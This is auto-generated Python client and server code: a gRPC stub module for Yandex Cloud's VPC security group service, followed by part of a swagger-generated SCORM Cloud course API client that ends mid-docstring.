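#       security_group_id='<SECURITY_GROUP_ID>')
#   group = stub.Get(request, metadata=(('authorization', 'Bearer <IAM_TOKEN>'),))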
class SecurityGroupServiceServicer(object):
"""Missing associated documentation comment in .proto file."""
def Get(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def List(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Create(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Update(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def UpdateRules(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def UpdateRule(self, request, context):
"""update rule description or labels
"""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Delete(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def Move(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def ListOperations(self, request, context):
"""Missing associated documentation comment in .proto file."""
context.set_code(grpc.StatusCode.UNIMPLEMENTED)
context.set_details('Method not implemented!')
raise NotImplementedError('Method not implemented!')
def add_SecurityGroupServiceServicer_to_server(servicer, server):
rpc_method_handlers = {
'Get': grpc.unary_unary_rpc_method_handler(
servicer.Get,
request_deserializer=yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.GetSecurityGroupRequest.FromString,
response_serializer=yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__pb2.SecurityGroup.SerializeToString,
),
'List': grpc.unary_unary_rpc_method_handler(
servicer.List,
request_deserializer=yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.ListSecurityGroupsRequest.FromString,
response_serializer=yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.ListSecurityGroupsResponse.SerializeToString,
),
'Create': grpc.unary_unary_rpc_method_handler(
servicer.Create,
request_deserializer=yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.CreateSecurityGroupRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'Update': grpc.unary_unary_rpc_method_handler(
servicer.Update,
request_deserializer=yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.UpdateSecurityGroupRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'UpdateRules': grpc.unary_unary_rpc_method_handler(
servicer.UpdateRules,
request_deserializer=yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.UpdateSecurityGroupRulesRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'UpdateRule': grpc.unary_unary_rpc_method_handler(
servicer.UpdateRule,
request_deserializer=yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.UpdateSecurityGroupRuleRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'Delete': grpc.unary_unary_rpc_method_handler(
servicer.Delete,
request_deserializer=yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.DeleteSecurityGroupRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'Move': grpc.unary_unary_rpc_method_handler(
servicer.Move,
request_deserializer=yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.MoveSecurityGroupRequest.FromString,
response_serializer=yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.SerializeToString,
),
'ListOperations': grpc.unary_unary_rpc_method_handler(
servicer.ListOperations,
request_deserializer=yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.ListSecurityGroupOperationsRequest.FromString,
response_serializer=yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.ListSecurityGroupOperationsResponse.SerializeToString,
),
}
generic_handler = grpc.method_handlers_generic_handler(
'yandex.cloud.vpc.v1.SecurityGroupService', rpc_method_handlers)
server.add_generic_rpc_handlers((generic_handler,))
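# Illustrative server wiring sketch (comment only; not part of the generated
# gRPC output). A concrete servicer would subclass SecurityGroupServiceServicer
# and override the methods it implements; the thread-pool size and port below
# are assumptions:
#
#   from concurrent import futures
#   server = grpc.server(futures.ThreadPoolExecutor(max_workers=10))
#   add_SecurityGroupServiceServicer_to_server(MySecurityGroupServicer(), server)
#   server.add_insecure_port('[::]:50051')
#   server.start()
#   server.wait_for_termination()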
# This class is part of an EXPERIMENTAL API.
class SecurityGroupService(object):
"""Missing associated documentation comment in .proto file."""
@staticmethod
def Get(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.vpc.v1.SecurityGroupService/Get',
yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.GetSecurityGroupRequest.SerializeToString,
yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__pb2.SecurityGroup.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
@staticmethod
def List(request,
target,
options=(),
channel_credentials=None,
call_credentials=None,
insecure=False,
compression=None,
wait_for_ready=None,
timeout=None,
metadata=None):
return grpc.experimental.unary_unary(request, target, '/yandex.cloud.vpc.v1.SecurityGroupService/List',
yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.ListSecurityGroupsRequest.SerializeToString,
yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.ListSecurityGroupsResponse.FromString,
options, channel_credentials,
insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def Create(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/yandex.cloud.vpc.v1.SecurityGroupService/Create',
            yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.CreateSecurityGroupRequest.SerializeToString,
            yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def Update(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/yandex.cloud.vpc.v1.SecurityGroupService/Update',
            yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.UpdateSecurityGroupRequest.SerializeToString,
            yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def UpdateRules(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/yandex.cloud.vpc.v1.SecurityGroupService/UpdateRules',
            yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.UpdateSecurityGroupRulesRequest.SerializeToString,
            yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def UpdateRule(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/yandex.cloud.vpc.v1.SecurityGroupService/UpdateRule',
            yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.UpdateSecurityGroupRuleRequest.SerializeToString,
            yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def Delete(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/yandex.cloud.vpc.v1.SecurityGroupService/Delete',
            yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.DeleteSecurityGroupRequest.SerializeToString,
            yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def Move(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/yandex.cloud.vpc.v1.SecurityGroupService/Move',
            yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.MoveSecurityGroupRequest.SerializeToString,
            yandex_dot_cloud_dot_operation_dot_operation__pb2.Operation.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)

    @staticmethod
    def ListOperations(request,
            target,
            options=(),
            channel_credentials=None,
            call_credentials=None,
            insecure=False,
            compression=None,
            wait_for_ready=None,
            timeout=None,
            metadata=None):
        return grpc.experimental.unary_unary(request, target, '/yandex.cloud.vpc.v1.SecurityGroupService/ListOperations',
            yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.ListSecurityGroupOperationsRequest.SerializeToString,
            yandex_dot_cloud_dot_vpc_dot_v1_dot_security__group__service__pb2.ListSecurityGroupOperationsResponse.FromString,
            options, channel_credentials,
            insecure, call_credentials, compression, wait_for_ready, timeout, metadata)
# coding: utf-8
"""
SCORM Cloud Rest API
REST API used for SCORM Cloud integrations. # noqa: E501
OpenAPI spec version: 2.0
Contact: systems@rusticisoftware.com
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from __future__ import absolute_import
import re # noqa: F401
# python 2 and python 3 compatibility library
import six
from rustici_software_cloud_v2.api_client import ApiClient


class CourseApi(object):
    """NOTE: This class is auto generated by the swagger code generator program.

    Do not edit the class manually.
    Ref: https://github.com/swagger-api/swagger-codegen
    """

    def __init__(self, api_client=None):
        if api_client is None:
            api_client = ApiClient()
        self.api_client = api_client

    def build_course_preview_launch_link(self, course_id, launch_link_request, **kwargs):  # noqa: E501
        """Get a launch link to preview a Course  # noqa: E501

        Returns the launch link to use to preview the course. Course preview does not require an underlying registration. As such, no interactions will be tracked during the preview launch. Previews are meant to be a way to confirm the course looks and acts the way it should. >**Note:** >The cmi5 standard does not support the ability to preview a course. A launch link can be built for a cmi5 course, but visiting the link will result in an error page. More details can be found in this [article explaining the complications behind cmi5 preview launches](https://support.scorm.com/hc/en-us/articles/1260805676710).  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.build_course_preview_launch_link(course_id, launch_link_request, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str course_id: (required)
        :param LaunchLinkRequestSchema launch_link_request: (required)
        :return: LaunchLinkSchema
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.build_course_preview_launch_link_with_http_info(course_id, launch_link_request, **kwargs)  # noqa: E501
        else:
            (data) = self.build_course_preview_launch_link_with_http_info(course_id, launch_link_request, **kwargs)  # noqa: E501
            return data

    def build_course_preview_launch_link_with_http_info(self, course_id, launch_link_request, **kwargs):  # noqa: E501
        """Get a launch link to preview a Course  # noqa: E501

        Returns the launch link to use to preview the course. Course preview does not require an underlying registration. As such, no interactions will be tracked during the preview launch. Previews are meant to be a way to confirm the course looks and acts the way it should. >**Note:** >The cmi5 standard does not support the ability to preview a course. A launch link can be built for a cmi5 course, but visiting the link will result in an error page. More details can be found in this [article explaining the complications behind cmi5 preview launches](https://support.scorm.com/hc/en-us/articles/1260805676710).  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.build_course_preview_launch_link_with_http_info(course_id, launch_link_request, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str course_id: (required)
        :param LaunchLinkRequestSchema launch_link_request: (required)
        :return: LaunchLinkSchema
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['course_id', 'launch_link_request']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method build_course_preview_launch_link" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'course_id' is set
        if ('course_id' not in params or
                params['course_id'] is None):
            raise ValueError("Missing the required parameter `course_id` when calling `build_course_preview_launch_link`")  # noqa: E501
        # verify the required parameter 'launch_link_request' is set
        if ('launch_link_request' not in params or
                params['launch_link_request'] is None):
            raise ValueError("Missing the required parameter `launch_link_request` when calling `build_course_preview_launch_link`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'course_id' in params:
            path_params['courseId'] = params['course_id']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'launch_link_request' in params:
            body_params = params['launch_link_request']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['APP_NORMAL', 'OAUTH']  # noqa: E501

        return self.api_client.call_api(
            '/courses/{courseId}/preview', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='LaunchLinkSchema',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def build_course_preview_launch_link_with_version(self, course_id, version_id, launch_link_request, **kwargs):  # noqa: E501
        """Get a launch link to preview a Course Version  # noqa: E501

        Returns the launch link to use to preview the course version. Course preview does not require an underlying registration. As such, no interactions will be tracked during the preview launch. Previews are meant to be a way to confirm the course looks and acts the way it should. >**Note:** >The cmi5 standard does not support the ability to preview a course. A launch link can be built for a cmi5 course, but visiting the link will result in an error page. More details can be found in this [article explaining the complications behind cmi5 preview launches](https://support.scorm.com/hc/en-us/articles/1260805676710).  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.build_course_preview_launch_link_with_version(course_id, version_id, launch_link_request, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str course_id: (required)
        :param int version_id: (required)
        :param LaunchLinkRequestSchema launch_link_request: (required)
        :return: LaunchLinkSchema
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.build_course_preview_launch_link_with_version_with_http_info(course_id, version_id, launch_link_request, **kwargs)  # noqa: E501
        else:
            (data) = self.build_course_preview_launch_link_with_version_with_http_info(course_id, version_id, launch_link_request, **kwargs)  # noqa: E501
            return data

    def build_course_preview_launch_link_with_version_with_http_info(self, course_id, version_id, launch_link_request, **kwargs):  # noqa: E501
        """Get a launch link to preview a Course Version  # noqa: E501

        Returns the launch link to use to preview the course version. Course preview does not require an underlying registration. As such, no interactions will be tracked during the preview launch. Previews are meant to be a way to confirm the course looks and acts the way it should. >**Note:** >The cmi5 standard does not support the ability to preview a course. A launch link can be built for a cmi5 course, but visiting the link will result in an error page. More details can be found in this [article explaining the complications behind cmi5 preview launches](https://support.scorm.com/hc/en-us/articles/1260805676710).  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.build_course_preview_launch_link_with_version_with_http_info(course_id, version_id, launch_link_request, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str course_id: (required)
        :param int version_id: (required)
        :param LaunchLinkRequestSchema launch_link_request: (required)
        :return: LaunchLinkSchema
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['course_id', 'version_id', 'launch_link_request']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method build_course_preview_launch_link_with_version" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'course_id' is set
        if ('course_id' not in params or
                params['course_id'] is None):
            raise ValueError("Missing the required parameter `course_id` when calling `build_course_preview_launch_link_with_version`")  # noqa: E501
        # verify the required parameter 'version_id' is set
        if ('version_id' not in params or
                params['version_id'] is None):
            raise ValueError("Missing the required parameter `version_id` when calling `build_course_preview_launch_link_with_version`")  # noqa: E501
        # verify the required parameter 'launch_link_request' is set
        if ('launch_link_request' not in params or
                params['launch_link_request'] is None):
            raise ValueError("Missing the required parameter `launch_link_request` when calling `build_course_preview_launch_link_with_version`")  # noqa: E501

        collection_formats = {}

        path_params = {}
        if 'course_id' in params:
            path_params['courseId'] = params['course_id']  # noqa: E501
        if 'version_id' in params:
            path_params['versionId'] = params['version_id']  # noqa: E501

        query_params = []

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'launch_link_request' in params:
            body_params = params['launch_link_request']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['APP_NORMAL', 'OAUTH']  # noqa: E501

        return self.api_client.call_api(
            '/courses/{courseId}/versions/{versionId}/preview', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='LaunchLinkSchema',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def create_fetch_and_import_course_job(self, course_id, import_request, **kwargs):  # noqa: E501
        """Create a Course from a package fetched from an external source  # noqa: E501

        Creates a course from a package fetched and imported from the provided url. The package will be downloaded from the url and stored in SCORM Cloud. An import job ID will be returned, which can be used with GetImportJobStatus to view the status of the import. Courses represent the learning material a learner will progress through. >**Note:** >The import job ID used for calls to GetImportJobStatus is only valid for one week after the course import finishes.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.create_fetch_and_import_course_job(course_id, import_request, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str course_id: A unique identifier your application will use to identify the course after import. Your application is responsible both for generating this unique ID and for keeping track of the ID for later use. (required)
        :param ImportFetchRequestSchema import_request: (required)
        :param bool may_create_new_version: Is it OK to create a new version of this course? If this is set to false and the course already exists, the upload will fail. If true and the course already exists then a new version will be created. No effect if the course doesn't already exist.
        :param str postback_url: An optional parameter that specifies a URL to send a postback to when the course has finished uploading.
        :return: StringResultSchema
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.create_fetch_and_import_course_job_with_http_info(course_id, import_request, **kwargs)  # noqa: E501
        else:
            (data) = self.create_fetch_and_import_course_job_with_http_info(course_id, import_request, **kwargs)  # noqa: E501
            return data

    def create_fetch_and_import_course_job_with_http_info(self, course_id, import_request, **kwargs):  # noqa: E501
        """Create a Course from a package fetched from an external source  # noqa: E501

        Creates a course from a package fetched and imported from the provided url. The package will be downloaded from the url and stored in SCORM Cloud. An import job ID will be returned, which can be used with GetImportJobStatus to view the status of the import. Courses represent the learning material a learner will progress through. >**Note:** >The import job ID used for calls to GetImportJobStatus is only valid for one week after the course import finishes.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.create_fetch_and_import_course_job_with_http_info(course_id, import_request, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str course_id: A unique identifier your application will use to identify the course after import. Your application is responsible both for generating this unique ID and for keeping track of the ID for later use. (required)
        :param ImportFetchRequestSchema import_request: (required)
        :param bool may_create_new_version: Is it OK to create a new version of this course? If this is set to false and the course already exists, the upload will fail. If true and the course already exists then a new version will be created. No effect if the course doesn't already exist.
        :param str postback_url: An optional parameter that specifies a URL to send a postback to when the course has finished uploading.
        :return: StringResultSchema
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['course_id', 'import_request', 'may_create_new_version', 'postback_url']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method create_fetch_and_import_course_job" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'course_id' is set
        if ('course_id' not in params or
                params['course_id'] is None):
            raise ValueError("Missing the required parameter `course_id` when calling `create_fetch_and_import_course_job`")  # noqa: E501
        # verify the required parameter 'import_request' is set
        if ('import_request' not in params or
                params['import_request'] is None):
            raise ValueError("Missing the required parameter `import_request` when calling `create_fetch_and_import_course_job`")  # noqa: E501

        collection_formats = {}

        path_params = {}

        query_params = []
        if 'course_id' in params:
            query_params.append(('courseId', params['course_id']))  # noqa: E501
        if 'may_create_new_version' in params:
            query_params.append(('mayCreateNewVersion', params['may_create_new_version']))  # noqa: E501
        if 'postback_url' in params:
            query_params.append(('postbackUrl', params['postback_url']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'import_request' in params:
            body_params = params['import_request']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['APP_NORMAL', 'OAUTH']  # noqa: E501

        return self.api_client.call_api(
            '/courses/importJobs', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='StringResultSchema',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def create_no_upload_and_import_course_job(self, course_id, import_request, **kwargs):  # noqa: E501
        """Create a Course from a fetched or referenced external media file  # noqa: E501

        Creates a course from one of two methods, fetchRequest or mediaFileReferenceRequest. In either case, an import job ID will be returned, which can be used with GetImportJobStatus to view the status of the import. Courses represent the learning material a learner will progress through. - A fetchRequest performs the same actions as CreateFetchAndImportCourseJob. A course will be created from a package fetched from the provided url. The package will be downloaded from the url and stored in SCORM Cloud. - A mediaFileReferenceRequest will not store the file in SCORM Cloud. Instead it will reference the media file at the time the learner needs to view the file from the provided url. >**Note:** >The import job ID used for calls to GetImportJobStatus is only valid for one week after the course import finishes. >**Info:** >Unless working with media files, it is typical to use one of the other two import methods. >- CreateUploadAndImportCourseJob would be used if the course is in your local file system. >- CreateFetchAndImportCourseJob would be better suited for situations where the course is uploaded remotely but is accessible via a public url.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.create_no_upload_and_import_course_job(course_id, import_request, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str course_id: A unique identifier your application will use to identify the course after import. Your application is responsible both for generating this unique ID and for keeping track of the ID for later use. (required)
        :param ImportRequestSchema import_request: (required)
        :param bool may_create_new_version: Is it OK to create a new version of this course? If this is set to false and the course already exists, the upload will fail. If true and the course already exists then a new version will be created. No effect if the course doesn't already exist.
        :param str postback_url: An optional parameter that specifies a URL to send a postback to when the course has finished uploading.
        :return: StringResultSchema
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('async_req'):
            return self.create_no_upload_and_import_course_job_with_http_info(course_id, import_request, **kwargs)  # noqa: E501
        else:
            (data) = self.create_no_upload_and_import_course_job_with_http_info(course_id, import_request, **kwargs)  # noqa: E501
            return data

    def create_no_upload_and_import_course_job_with_http_info(self, course_id, import_request, **kwargs):  # noqa: E501
        """Create a Course from a fetched or referenced external media file  # noqa: E501

        Creates a course from one of two methods, fetchRequest or mediaFileReferenceRequest. In either case, an import job ID will be returned, which can be used with GetImportJobStatus to view the status of the import. Courses represent the learning material a learner will progress through. - A fetchRequest performs the same actions as CreateFetchAndImportCourseJob. A course will be created from a package fetched from the provided url. The package will be downloaded from the url and stored in SCORM Cloud. - A mediaFileReferenceRequest will not store the file in SCORM Cloud. Instead it will reference the media file at the time the learner needs to view the file from the provided url. >**Note:** >The import job ID used for calls to GetImportJobStatus is only valid for one week after the course import finishes. >**Info:** >Unless working with media files, it is typical to use one of the other two import methods. >- CreateUploadAndImportCourseJob would be used if the course is in your local file system. >- CreateFetchAndImportCourseJob would be better suited for situations where the course is uploaded remotely but is accessible via a public url.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.create_no_upload_and_import_course_job_with_http_info(course_id, import_request, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str course_id: A unique identifier your application will use to identify the course after import. Your application is responsible both for generating this unique ID and for keeping track of the ID for later use. (required)
        :param ImportRequestSchema import_request: (required)
        :param bool may_create_new_version: Is it OK to create a new version of this course? If this is set to false and the course already exists, the upload will fail. If true and the course already exists then a new version will be created. No effect if the course doesn't already exist.
        :param str postback_url: An optional parameter that specifies a URL to send a postback to when the course has finished uploading.
        :return: StringResultSchema
                 If the method is called asynchronously,
                 returns the request thread.
        """

        all_params = ['course_id', 'import_request', 'may_create_new_version', 'postback_url']  # noqa: E501
        all_params.append('async_req')
        all_params.append('_return_http_data_only')
        all_params.append('_preload_content')
        all_params.append('_request_timeout')

        params = locals()
        for key, val in six.iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method create_no_upload_and_import_course_job" % key
                )
            params[key] = val
        del params['kwargs']
        # verify the required parameter 'course_id' is set
        if ('course_id' not in params or
                params['course_id'] is None):
            raise ValueError("Missing the required parameter `course_id` when calling `create_no_upload_and_import_course_job`")  # noqa: E501
        # verify the required parameter 'import_request' is set
        if ('import_request' not in params or
                params['import_request'] is None):
            raise ValueError("Missing the required parameter `import_request` when calling `create_no_upload_and_import_course_job`")  # noqa: E501

        collection_formats = {}

        path_params = {}

        query_params = []
        if 'course_id' in params:
            query_params.append(('courseId', params['course_id']))  # noqa: E501
        if 'may_create_new_version' in params:
            query_params.append(('mayCreateNewVersion', params['may_create_new_version']))  # noqa: E501
        if 'postback_url' in params:
            query_params.append(('postbackUrl', params['postback_url']))  # noqa: E501

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'import_request' in params:
            body_params = params['import_request']
        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.select_header_accept(
            ['application/json'])  # noqa: E501

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
            ['application/json'])  # noqa: E501

        # Authentication setting
        auth_settings = ['APP_NORMAL', 'OAUTH']  # noqa: E501

        return self.api_client.call_api(
            '/courses/importJobs/noUpload', 'POST',
            path_params,
            query_params,
            header_params,
            body=body_params,
            post_params=form_params,
            files=local_var_files,
            response_type='StringResultSchema',  # noqa: E501
            auth_settings=auth_settings,
            async_req=params.get('async_req'),
            _return_http_data_only=params.get('_return_http_data_only'),
            _preload_content=params.get('_preload_content', True),
            _request_timeout=params.get('_request_timeout'),
            collection_formats=collection_formats)

    def create_upload_and_import_course_job(self, course_id, **kwargs):  # noqa: E501
        """Create a Course from an uploaded package  # noqa: E501

        Creates a course from a package uploaded from your file system. The package will be sent as part of the request and will be stored in SCORM Cloud. An import job ID will be returned, which can be used with GetImportJobStatus to view the status of the import. Courses represent the learning material a learner will progress through. >**Note:** >The import job ID used for calls to GetImportJobStatus is only valid for one week after the course import finishes.  # noqa: E501
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please pass async_req=True
        >>> thread = api.create_upload_and_import_course_job(course_id, async_req=True)
        >>> result = thread.get()

        :param async_req bool
        :param str course_id: A unique identifier your application will use to identify the course after import. Your application is responsible both for generating this unique ID and for keeping track of the ID for later use. (required)
